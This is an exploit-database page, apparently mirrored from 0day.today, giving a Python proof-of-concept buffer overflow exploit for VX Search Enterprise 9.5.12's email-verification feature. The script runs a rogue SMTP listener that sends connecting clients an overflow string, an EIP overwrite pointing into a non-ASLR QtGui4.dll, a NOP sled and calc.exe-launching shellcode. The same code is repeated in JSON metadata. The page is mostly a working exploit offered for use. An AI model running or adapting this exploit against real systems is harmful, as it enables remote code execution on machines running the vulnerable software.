Search...

VX Search Enterprise 9.5.12 - Verify Email Buffer Overflow Exploit

2017-03-28T00:00:00

ID 1337DAY-ID-27458
Type zdt
Reporter ScrR1pTK1dd13
Modified 2017-03-28T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            author = '''
   
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: [email protected]    # 
                ##############################################
   
# Exploit Title: VX Search Enterprise v9.5.12 email verify exploit
# Date: 2017.03.28
# Exploit Author: Greg Priest
# Version: VX Search Enterprise v9.5.12
# Tested on: Windows7 x64 HUN/ENG Professional
'''
 
 
import socket
 
port = 25
s = socket.socket()
ip = '127.0.0.1'           
s.bind((ip, port))            
s.listen(5)                    
 
overflow = "A" * 256
eip = "\x7A\xB7\x1B\x65"
# Search NO ASLR with mona.py
#"\x94\x21\x1C\x65" NO ASLR QtGui4.dll
#"\x7A\xB7\x1B\x65" NO ASLR QtGui4.dll
#"\x09\xc9\x1D\x65" NO ASLR QtGui4.dll
nop = "\x90" * 12
#calc.exe
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
 
exploit = overflow+eip+nop+shellcode
 
print "Listening on port:", port
 
while True:
    conn, addr = s.accept()     
    conn.send(exploit+'\r\n')
    conn.close()
    print ""
    print "Succesfully exploitation!"

#  0day.today [2018-03-28]  #

JSON Vulners Source

Initial Source

{"sourceData": "author = '''\r\n \r\n ##############################################\r\n # Created: ScrR1pTK1dd13 #\r\n # Name: Greg Priest #\r\n # Mail: [email\u00a0protected] # \r\n ##############################################\r\n \r\n# Exploit Title: VX Search Enterprise v9.5.12 email verify exploit\r\n# Date: 2017.03.28\r\n# Exploit Author: Greg Priest\r\n# Version: VX Search Enterprise v9.5.12\r\n# Tested on: Windows7 x64 HUN/ENG Professional\r\n'''\r\n \r\n \r\nimport socket\r\n \r\nport = 25\r\ns = socket.socket()\r\nip = '127.0.0.1' \r\ns.bind((ip, port)) \r\ns.listen(5) \r\n \r\noverflow = \"A\" * 256\r\neip = \"\\x7A\\xB7\\x1B\\x65\"\r\n# Search NO ASLR with mona.py\r\n#\"\\x94\\x21\\x1C\\x65\" NO ASLR QtGui4.dll\r\n#\"\\x7A\\xB7\\x1B\\x65\" NO ASLR QtGui4.dll\r\n#\"\\x09\\xc9\\x1D\\x65\" NO ASLR QtGui4.dll\r\nnop = \"\\x90\" * 12\r\n#calc.exe\r\nshellcode =(\r\n\"\\x31\\xdb\\x64\\x8b\\x7b\\x30\\x8b\\x7f\" +\r\n\"\\x0c\\x8b\\x7f\\x1c\\x8b\\x47\\x08\\x8b\" +\r\n\"\\x77\\x20\\x8b\\x3f\\x80\\x7e\\x0c\\x33\" +\r\n\"\\x75\\xf2\\x89\\xc7\\x03\\x78\\x3c\\x8b\" +\r\n\"\\x57\\x78\\x01\\xc2\\x8b\\x7a\\x20\\x01\" +\r\n\"\\xc7\\x89\\xdd\\x8b\\x34\\xaf\\x01\\xc6\" +\r\n\"\\x45\\x81\\x3e\\x43\\x72\\x65\\x61\\x75\" +\r\n\"\\xf2\\x81\\x7e\\x08\\x6f\\x63\\x65\\x73\" +\r\n\"\\x75\\xe9\\x8b\\x7a\\x24\\x01\\xc7\\x66\" +\r\n\"\\x8b\\x2c\\x6f\\x8b\\x7a\\x1c\\x01\\xc7\" +\r\n\"\\x8b\\x7c\\xaf\\xfc\\x01\\xc7\\x89\\xd9\" +\r\n\"\\xb1\\xff\\x53\\xe2\\xfd\\x68\\x63\\x61\" +\r\n\"\\x6c\\x63\\x89\\xe2\\x52\\x52\\x53\\x53\" +\r\n\"\\x53\\x53\\x53\\x53\\x52\\x53\\xff\\xd7\")\r\n \r\nexploit = overflow+eip+nop+shellcode\r\n \r\nprint \"Listening on port:\", port\r\n \r\nwhile True:\r\n conn, addr = s.accept() \r\n conn.send(exploit+'\\r\\n')\r\n conn.close()\r\n print \"\"\r\n print \"Succesfully exploitation!\"\n\n# 0day.today [2018-03-28] #", "description": "Exploit for windows platform in category dos / poc", "sourceHref": "https://0day.today/exploit/27458", "reporter": "ScrR1pTK1dd13", "href": "https://0day.today/exploit/description/27458", "type": "zdt", "viewCount": 6, "references": [], "lastseen": "2018-03-28T03:23:16", "published": "2017-03-28T00:00:00", "cvelist": [], "id": "1337DAY-ID-27458", "modified": "2017-03-28T00:00:00", "title": "VX Search Enterprise 9.5.12 - Verify Email Buffer Overflow Exploit", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-03-28T03:23:16", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-28T03:23:16", "rev": 2}, "vulnersScore": 0.5}}